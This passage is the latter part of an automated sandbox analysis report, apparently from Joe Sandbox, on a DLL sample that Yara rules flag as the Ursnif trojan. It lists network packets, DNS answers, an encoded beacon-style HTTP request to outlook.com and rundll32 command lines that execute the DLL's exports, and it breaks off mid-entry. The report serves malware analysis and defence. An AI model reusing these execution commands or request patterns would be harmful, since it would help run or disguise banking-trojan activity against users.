                                                                                                              Jul 14, 2021 15:47:27.880019903 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.880135059 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.893385887 CEST4434974052.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.893428087 CEST4434974052.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.893445969 CEST4434974052.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.893712044 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.893740892 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.893764973 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.893800974 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.893832922 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.895772934 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.895807981 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.905314922 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.905325890 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.905906916 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.918260098 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.918688059 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.918766022 CEST4434974052.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.918792963 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.921442032 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.921480894 CEST49740443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.921566010 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.921765089 CEST49741443192.168.2.352.97.232.194
                                                                                                              Jul 14, 2021 15:47:27.933998108 CEST4434974152.97.232.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.950299025 CEST4434973840.97.128.194192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.968878984 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.968952894 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.981242895 CEST4434974252.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.981312990 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.981385946 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.981458902 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.982570887 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.982765913 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.995965004 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.996010065 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.996062040 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.996067047 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.996077061 CEST4434974252.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.996094942 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.996103048 CEST4434974252.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.996126890 CEST4434974252.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:27.996139050 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.996156931 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:27.996195078 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.005089998 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.006068945 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.006774902 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.018382072 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:28.018570900 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:28.018647909 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.020140886 CEST4434974252.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:28.020221949 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.025572062 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:28.025607109 CEST4434974352.97.186.114192.168.2.3
                                                                                                              Jul 14, 2021 15:47:28.025651932 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.025672913 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:28.917479038 CEST4973280192.168.2.340.97.116.82
                                                                                                              Jul 14, 2021 15:47:28.917793989 CEST49736443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:28.917851925 CEST49735443192.168.2.352.97.201.242
                                                                                                              Jul 14, 2021 15:47:28.919277906 CEST49737443192.168.2.352.98.168.178
                                                                                                              Jul 14, 2021 15:47:29.447514057 CEST49739443192.168.2.340.97.128.194
                                                                                                              Jul 14, 2021 15:47:29.447717905 CEST49743443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:29.447787046 CEST49742443192.168.2.352.97.186.114
                                                                                                              Jul 14, 2021 15:47:29.448146105 CEST49740443192.168.2.352.97.232.194

UDP Packets

                                                                                                              Jul 14, 2021 15:48:10.721282005 CEST53521238.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:10.790649891 CEST5633853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:10.803733110 CEST53563388.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.821281910 CEST5942053192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.827414036 CEST5878453192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.834091902 CEST6397853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.834767103 CEST53594208.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.847233057 CEST53639788.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.850749016 CEST6293853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.863822937 CEST53629388.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.873614073 CEST5570853192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.877441883 CEST5680353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.880283117 CEST5714553192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.891727924 CEST53568038.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.892944098 CEST53571458.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.947179079 CEST5535953192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.960560083 CEST53553598.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.983000994 CEST5830653192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.987709045 CEST6412453192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.995903969 CEST53583068.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.000539064 CEST53641248.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.067157030 CEST4936153192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.079461098 CEST53587848.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.083242893 CEST53493618.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.095902920 CEST6315053192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.125993013 CEST53557088.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.137020111 CEST53631508.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.228458881 CEST5327953192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.242551088 CEST53532798.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.323012114 CEST5688153192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.336105108 CEST53568818.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.684083939 CEST5364253192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.699738979 CEST53536428.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.879894972 CEST5566753192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.893663883 CEST53556678.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.907186985 CEST5483353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.942995071 CEST6247653192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.956402063 CEST53624768.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.987462044 CEST4970553192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.014607906 CEST53497058.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.028877020 CEST6147753192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.032063007 CEST6163353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.041376114 CEST53614778.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.045175076 CEST53616338.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.103856087 CEST5594953192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST53559498.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.141252041 CEST5760153192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.144398928 CEST4934253192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.154074907 CEST53576018.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.157198906 CEST53493428.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.163647890 CEST53548338.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.490489006 CEST5625353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.510392904 CEST53562538.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.665746927 CEST4966753192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.678721905 CEST53496678.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.952934027 CEST5543953192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.966341019 CEST53554398.8.8.8192.168.2.3

DNS Queries

Timestamp    Source IP    Dest IP    Trans ID    OP Code    Name    Type    Class

DNS Answers

Timestamp    Source IP    Dest IP    Trans ID    Reply Code    Name    CName    Address    Type    Class
                                                                                                              Jul 14, 2021 15:48:11.863822937 CEST8.8.8.8192.168.2.30x65f2No error (0)di.rdtcdn.comcds.e9q5t8x5.hwcdn.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.891727924 CEST8.8.8.8192.168.2.30xad42No error (0)di.rdtcdn.comcds.e9q5t8x5.hwcdn.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.892944098 CEST8.8.8.8192.168.2.30x6d41No error (0)static.trafficjunky.comvip0x04f.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.892944098 CEST8.8.8.8192.168.2.30x6d41No error (0)vip0x04f.ssl.rncdn5.com205.185.208.79A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.960560083 CEST8.8.8.8192.168.2.30x7a2No error (0)ht.redtube.comhubtraffic.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.960560083 CEST8.8.8.8192.168.2.30x7a2No error (0)hubtraffic.com66.254.114.32A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.995903969 CEST8.8.8.8192.168.2.30xfad8No error (0)static.trafficjunky.comvip0x04f.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.995903969 CEST8.8.8.8192.168.2.30xfad8No error (0)vip0x04f.ssl.rncdn5.com205.185.208.79A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.000539064 CEST8.8.8.8192.168.2.30x15e3No error (0)ht.redtube.comhubtraffic.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.000539064 CEST8.8.8.8192.168.2.30x15e3No error (0)hubtraffic.com66.254.114.32A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.079461098 CEST8.8.8.8192.168.2.30xf681No error (0)ei.rdtcdn.comei.rdtcdn.com.sds.rncdn7.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.079461098 CEST8.8.8.8192.168.2.30xf681No error (0)ei.rdtcdn.com.sds.rncdn7.com64.210.135.70A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.079461098 CEST8.8.8.8192.168.2.30xf681No error (0)ei.rdtcdn.com.sds.rncdn7.com64.210.135.72A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.079461098 CEST8.8.8.8192.168.2.30xf681No error (0)ei.rdtcdn.com.sds.rncdn7.com64.210.135.68A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.083242893 CEST8.8.8.8192.168.2.30x9ffaNo error (0)static.trafficjunky.comvip0x04f.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.083242893 CEST8.8.8.8192.168.2.30x9ffaNo error (0)vip0x04f.ssl.rncdn5.com205.185.208.79A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.125993013 CEST8.8.8.8192.168.2.30xaa8cNo error (0)ei.rdtcdn.comei.rdtcdn.com.sds.rncdn7.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.125993013 CEST8.8.8.8192.168.2.30xaa8cNo error (0)ei.rdtcdn.com.sds.rncdn7.com64.210.135.72A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.125993013 CEST8.8.8.8192.168.2.30xaa8cNo error (0)ei.rdtcdn.com.sds.rncdn7.com64.210.135.68A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.125993013 CEST8.8.8.8192.168.2.30xaa8cNo error (0)ei.rdtcdn.com.sds.rncdn7.com64.210.135.70A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.242551088 CEST8.8.8.8192.168.2.30x330dNo error (0)cdn1d-static-shared.phncdn.comvip0x08e.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.242551088 CEST8.8.8.8192.168.2.30x330dNo error (0)vip0x08e.ssl.rncdn5.com205.185.208.142A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.699738979 CEST8.8.8.8192.168.2.30x6311No error (0)stats.g.doubleclick.netstats.l.doubleclick.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.699738979 CEST8.8.8.8192.168.2.30x6311No error (0)stats.l.doubleclick.net74.125.128.154A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.699738979 CEST8.8.8.8192.168.2.30x6311No error (0)stats.l.doubleclick.net74.125.128.156A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.699738979 CEST8.8.8.8192.168.2.30x6311No error (0)stats.l.doubleclick.net74.125.128.157A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.699738979 CEST8.8.8.8192.168.2.30x6311No error (0)stats.l.doubleclick.net74.125.128.155A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.893663883 CEST8.8.8.8192.168.2.30x852No error (0)di-ph.rdtcdn.comcds.b8w3s7t8.hwcdn.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.014607906 CEST8.8.8.8192.168.2.30xf5f8No error (0)www.google.ch172.217.168.3A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.041376114 CEST8.8.8.8192.168.2.30xa57dNo error (0)hw-cdn.trafficjunky.netvip0x055.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.041376114 CEST8.8.8.8192.168.2.30xa57dNo error (0)vip0x055.ssl.rncdn5.com205.185.208.85A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.045175076 CEST8.8.8.8192.168.2.30xe7a8No error (0)ads.trafficjunky.net66.254.114.38A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)www.adpmbtj.comadpmbtj.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)adpmbtj.com192.99.16.134A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)adpmbtj.com192.99.16.68A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)adpmbtj.com142.4.219.200A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)adpmbtj.com192.99.16.137A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)adpmbtj.com192.99.16.114A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)adpmbtj.com192.99.16.132A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.154074907 CEST8.8.8.8192.168.2.30xd35No error (0)hw-cdn.trafficjunky.netvip0x055.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.154074907 CEST8.8.8.8192.168.2.30xd35No error (0)vip0x055.ssl.rncdn5.com205.185.208.85A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.157198906 CEST8.8.8.8192.168.2.30xa895No error (0)ads.trafficjunky.net66.254.114.38A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.163647890 CEST8.8.8.8192.168.2.30xb4b3No error (0)ei-ph.rdtcdn.comei-ph.rdtcdn.com.sds.rncdn7.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.163647890 CEST8.8.8.8192.168.2.30xb4b3No error (0)ei-ph.rdtcdn.com.sds.rncdn7.com64.210.135.68A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.163647890 CEST8.8.8.8192.168.2.30xb4b3No error (0)ei-ph.rdtcdn.com.sds.rncdn7.com64.210.135.70A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.163647890 CEST8.8.8.8192.168.2.30xb4b3No error (0)ei-ph.rdtcdn.com.sds.rncdn7.com64.210.135.72A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.510392904 CEST8.8.8.8192.168.2.30x1fb9No error (0)v.vfgte.comstivers-ricsovers.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.510392904 CEST8.8.8.8192.168.2.30x1fb9No error (0)stivers-ricsovers.com3.65.154.208A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.510392904 CEST8.8.8.8192.168.2.30x1fb9No error (0)stivers-ricsovers.com18.195.174.160A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.678721905 CEST8.8.8.8192.168.2.30x4639No error (0)cdn1d-static-shared.phncdn.comvip0x08e.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.678721905 CEST8.8.8.8192.168.2.30x4639No error (0)vip0x08e.ssl.rncdn5.com205.185.208.142A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.966341019 CEST8.8.8.8192.168.2.30x901bNo error (0)s2.static.cfgr3.comvip0x011.ssl.hwcdn.netCNAME (Canonical name)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • outlook.com

                                                                                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49731 | 40.97.116.82 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jul 14, 2021 15:47:26.154158115 CEST | 1351 | OUT | GET /grower/YjL_2BjDOrQaqruzKZl/J5qQT1PxhAWv_2ByqUpS3r/fw5c6vWOUvogF/fDf6v7zv/NA3IFZsX5L82cDak57at8n5/D4Cfgi7tVz/ry3I5zo4IJ_2BIobC/5nWwD7akwp5A/XzqLAJr21mH/cjfkiJFlq9y77G/1bzeLjs6zco1VtNrrz8EL/tJlbiHzqPNR1Mami/EAf48einPLf/Q.grow HTTP/1.1
                                                                                                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                              Accept-Language: en-US
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Host: outlook.com
                                                                                                              Connection: Keep-Alive
Jul 14, 2021 15:47:26.318327904 CEST | 1351 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Location: https://outlook.com/grower/YjL_2BjDOrQaqruzKZl/J5qQT1PxhAWv_2ByqUpS3r/fw5c6vWOUvogF/fDf6v7zv/NA3IFZsX5L82cDak57at8n5/D4Cfgi7tVz/ry3I5zo4IJ_2BIobC/5nWwD7akwp5A/XzqLAJr21mH/cjfkiJFlq9y77G/1bzeLjs6zco1VtNrrz8EL/tJlbiHzqPNR1Mami/EAf48einPLf/Q.grow
                                                                                                              Server: Microsoft-IIS/10.0
                                                                                                              request-id: e5b375e1-ab4a-b04b-d96a-87a09a6f4fed
                                                                                                              X-FEServer: MWHPR13CA0020
                                                                                                              X-RequestId: 04dd39db-fffd-4c97-b71e-7102df85c47b
                                                                                                              X-Powered-By: ASP.NET
                                                                                                              X-FEServer: MWHPR13CA0020
                                                                                                              Date: Wed, 14 Jul 2021 13:47:25 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 0


                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              CPU Usage


                                                                                                              Memory Usage


                                                                                                              Behavior


                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Start time:15:46:03
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\System32\loaddll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:loaddll32.exe 'C:\Users\user\Desktop\945.dll'
                                                                                                              Imagebase:0xf40000
                                                                                                              File size:116736 bytes
                                                                                                              MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392687998.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.487967194.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392901039.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392858796.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392613103.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392808909.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392529075.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392768559.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392386685.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:46:04
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\945.dll',#1
                                                                                                              Imagebase:0xbd0000
                                                                                                              File size:232960 bytes
                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:46:04
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\945.dll,Clockcondition
                                                                                                              Imagebase:0xaf0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:46:04
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe 'C:\Users\user\Desktop\945.dll',#1
                                                                                                              Imagebase:0xaf0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391393759.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391313671.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391228461.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391141192.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391066845.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391440627.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.390980633.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.390863638.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:46:09
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\945.dll,Dogwhen
                                                                                                              Imagebase:0xaf0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:46:13
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\945.dll,Sing
